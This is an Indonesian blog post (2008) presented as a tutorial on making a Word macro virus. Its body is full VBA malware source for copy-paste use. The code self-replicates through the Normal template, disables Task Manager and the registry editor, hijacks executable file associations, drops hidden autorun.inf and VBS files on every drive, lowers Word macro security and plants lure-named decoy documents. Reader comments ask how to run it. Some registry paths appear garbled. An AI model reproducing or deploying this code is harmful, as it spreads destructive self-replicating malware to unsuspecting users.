MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Tutorial Membuat Virus Macro

Posted by Morphic pada September 11, 2008


(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)

Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.

Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).

Pasti banyak bertanya kenapa kali ini Morphic membahas tentang cara membuat virus? Biasanya kan Morphic lebih sering membahas analisis virus atau antivirusnya itu….

Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.

Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..


Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.

CARA MEMBUAT VIRUS MACRO

  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor

    • Akan muncul gambar di bawah

      Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.

      Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???

      Tenang, aku dah siapkan kok sourcenya. Makan neh source code!

      ‘This is my code’s virus

      ‘Fuck Gates. Your software has small weakness. Watch it!

      ‘Macro Viruses

      ‘[Macroid]

      ‘Hanya untuk pembelajaran

      Private Sub Document_Close()

      Dim AD, NT As Object

      Dim isi As String

      Set AD = ActiveDocument.VBProject.VBComponents.Item(1)

      Set NT = NormalTemplate.VBProject.VBComponents.Item(1)

      If AD.Name <> “Macroid” Then

      AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines

      AD.Name = “Macroid”

      isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)

      AD.CodeModule.AddFromString isi

      ActiveDocument.Save

      End If

      If NT.Name <> “Macroid” Then

      NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines

      NT.Name = “Macroid”

      isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)

      NT.CodeModule.AddFromString isi

      NormalTemplate.Save

      End If

      If InStr(ActiveDocument.Content, “Macroid”) = 0 Then

      ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008”

      End If

      On Error Resume Next

      Dim b As Object

      Set b = CreateObject(“Wscript.Shell”)

      b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”

      b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”

      b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”

      b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”

      b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1”

      b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”

      b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”

      b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”

      b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      On Error Resume Next

      Dim rog As Integer

      Dim atr, vbs, Tipu(10), Trik(10) As String

      For a = 66 To 90

      partisi = Chr$(a)

      vbs = partisi & “:\auto.vbs”

      atr = partisi & “:\autorun.inf”

      Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”

      Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”

      Tipu(3) = partisi & “:\Titip File sebentar.doc”

      Tipu(4) = partisi & “:\jangan di baca.doc”

      Tipu(5) = partisi & “:\buku harian.doc”

      Tipu(6) = partisi & “:\cerita hangat.doc”

      Tipu(7) = partisi & “:\Punya Baim.doc”

      Tipu(8) = partisi & “:\Teka-teki yang baru.doc”

      Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”

      Tipu(10) = partisi & “:\Trik Sulap.doc”

      If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then

      Randomize

      rog = Int(10 * Rnd) + 1

      Open Tipu(rog) For Output As #1

      Print #1, “”

      Close #1

      End If

      Trik(1) = partisi & “:\Novel J.K.Rowling.doc”

      Trik(2) = partisi & “:\cerita cinta.doc”

      Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”

      Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”

      Trik(5) = partisi & “:\Kumpulan Cheat game.doc”

      Trik(6) = partisi & “:\Cheat game RF.doc”

      Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”

      Trik(8) = partisi & “:\Goosebumps.doc”

      Trik(9) = partisi & “:\FearStreet.doc”

      Trik(10) = partisi & “:\R.L.Stine.doc”

      If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then

      Randomize

      rogi = Int(10 * Rnd) + 1

      Open Trik(rogi) For Output As #1

      Print #1, “”

      Close #1

      End If

      Open atr For Output As #1

      Print #1, “[Autorun]”

      Print #1, “shell\Open\command=wscript.exe auto.vbs”

      Close #1

      SetAttr atr, vbHidden + vbSystem

      Open vbs For Output As #1

      Print #1, “dim a”

      Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1” & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1” & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1” & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Close #1

      SetAttr vbs, vbHidden + vbSystem

      Next a

      If Dir(Environ$(“windir”) & “\Macroid.doc”) = “” Then

      Dim isicrita As String

      isicrita = “[Macroid] by Morphic” & vbCrLf & “Copyright(c) Medan Juli-2008” & vbCrLf & vbCrLf & _

      Chr(34) & “Ms.Word is a thing that can be used as a power to break everything…. ” & Chr(34) & vbCrLf & “(Morphic)”

      Open Environ$(“windir”) & “\Macroid.doc” For Output As #1

      Print #1, isicrita

      Close #1

      End If

      If Dir(Environ$(“windir”) & “\avmc.vbs”) = “” Then

      Open Environ$(“windir”) & “\avmc.vbs” For Output As #1

      Print #1, “set fs = createobject(” & Chr(34) & “Scripting.FileSystemObject” & Chr(34) & “)”

      Print #1, “for each FD in fs.drives”

      Print #1, “if (FD.Drivetype = 1) and FD.Path <> ” & Chr(34) & “A:” & Chr(34) & ” then”

      Print #1, “set tf = fs.CreateTextFile(FD.Path” & Chr(38) & Chr(34) & “\Jangan di baca.doc” & Chr(34) & “)”

      Print #1, “end if”

      Print #1, “Next”

      Close #1

      End If

      ActiveDocument.Save

      NormalTemplate.Save

      End Sub

      Private Sub Document_Open()

      CommandBars(“Tools”).Controls(“Macro”).Visible = False

      CommandBars(“Tools”).Controls(“Macro”).Enabled = False

      CommandBars(“Tools”).Controls(“Customize…”).Visible = False

      CommandBars(“Tools”).Controls(“Options…”).Visible = False

      Dim AD, NT As Object

      Dim isi As String

      Set AD = ActiveDocument.VBProject.VBComponents.Item(1)

      Set NT = NormalTemplate.VBProject.VBComponents.Item(1)

      If AD.Name <> “Macroid” Then

      AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines

      AD.Name = “Macroid”

      isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)

      AD.CodeModule.AddFromString isi

      ActiveDocument.Save

      End If

      If NT.Name <> “Macroid” Then

      NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines

      NT.Name = “Macroid”

      isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)

      NT.CodeModule.AddFromString isi

      NormalTemplate.Save

      End If

      If InStr(ActiveDocument.Content, “Macroid”) = 0 Then

      ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008”

      End If

      On Error Resume Next

      Dim b As Object

      Set b = CreateObject(“Wscript.Shell”)

      b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”

      b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”

      b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”

      b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”

      b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1”

      b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”

      b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”

      b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”

      b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      On Error Resume Next

      Dim rog As Integer

      Dim atr, vbs, Tipu(10), Trik(10) As String

      For a = 66 To 90

      partisi = Chr$(a)

      vbs = partisi & “:\auto.vbs”

      atr = partisi & “:\autorun.inf”

      Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”

      Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”

      Tipu(3) = partisi & “:\Titip File sebentar.doc”

      Tipu(4) = partisi & “:\jangan di baca.doc”

      Tipu(5) = partisi & “:\buku harian.doc”

      Tipu(6) = partisi & “:\cerita hangat.doc”

      Tipu(7) = partisi & “:\Punya Baim.doc”

      Tipu(8) = partisi & “:\Teka-teki yang baru.doc”

      Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”

      Tipu(10) = partisi & “:\Trik Sulap.doc”

      If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then

      Randomize

      rog = Int(10 * Rnd) + 1

      Open Tipu(rog) For Output As #1

      Print #1, “”

      Close #1

      End If

      Trik(1) = partisi & “:\Novel J.K.Rowling.doc”

      Trik(2) = partisi & “:\cerita cinta.doc”

      Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”

      Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”

      Trik(5) = partisi & “:\Kumpulan Cheat game.doc”

      Trik(6) = partisi & “:\Cheat game RF.doc”

      Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”

      Trik(8) = partisi & “:\Goosebumps.doc”

      Trik(9) = partisi & “:\FearStreet.doc”

      Trik(10) = partisi & “:\R.L.Stine.doc”

      If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then

      Randomize

      rogi = Int(10 * Rnd) + 1

      Open Trik(rogi) For Output As #1

      Print #1, “”

      Close #1

      End If

      Open atr For Output As #1

      Print #1, “[Autorun]”

      Print #1, “shell\Open\command=wscript.exe auto.vbs”

      Close #1

      SetAttr atr, vbHidden + vbSystem

      Open vbs For Output As #1

      Print #1, “dim a”

      Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1” & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1” & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1” & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Close #1

      SetAttr vbs, vbHidden + vbSystem

      Next a

      End Sub

      Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg……. Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.

      EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI

      Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!

      Jawabannya lihat di bawah!!

      By: Morphic

      https://morphians.wordpress.com (My blog)

      www.friendster.com/morphic (my friendster)

      karta_morphic@yahoo.co.id (mail me here!)

      http://morphic.4shared.com (Download file and upload virus here!)

      Special thankz to:

      -Both of my parents

      -Both of my sisters

      -All of my friends in Smansa Medan (khususnya anak-anak XII IPA 10)

      -Para pejuang UMB dan SNMPTN tahun depan. (Semoga aku lulussss!!!!)

      -Anak-anak Permata_SetiaBudi Medan

      MorphostLab!

      10 Tanggapan to “Tutorial Membuat Virus Macro”

      1. laila wulandari said

        nanti dokumennya disimpan dengan ekstension apa??? doc atau vbs??/

      2. Morphic said

        @Haris
        buka ms.word terus tools>macro>visualbasiceditor

        terus nanti disitu ada kotak teks seperti di Visual basic juga..

        nah, code diatas bisa dicopy dan paste ke teks baris di situ.

        silakan coba aja dulu. kalo ada pertanyaan tanya balik lagi ya.

      3. haris said

        cara simpannya jga
        sory banyak nanya coz aq newbin

      4. haris said

        trus cara menjalankaNNYA GIMANA BANG

      5. PERBOSA creative team said

        makacih tutornya………..

      6. Morphic said

        gunakan source dengan bijak

      7. poet_freak said

        boozzz mao lapor…

        dy gag jalan… udah di coba pake sandbox.. tetep ajah gag ngaruh..

      8. dian said

        keren cuy sourcena…ga t’lintas jga dalam pkran gw klo bsa dibuat spt ini…

        .: viva programmer indonesia :.

      Tinggalkan Balasan

      Isikan data di bawah atau klik salah satu ikon untuk log in:

      Logo WordPress.com

      You are commenting using your WordPress.com account. Logout / Ubah )

      Gambar Twitter

      You are commenting using your Twitter account. Logout / Ubah )

      Foto Facebook

      You are commenting using your Facebook account. Logout / Ubah )

      Foto Google+

      You are commenting using your Google+ account. Logout / Ubah )

      Connecting to %s

       
      %d blogger menyukai ini: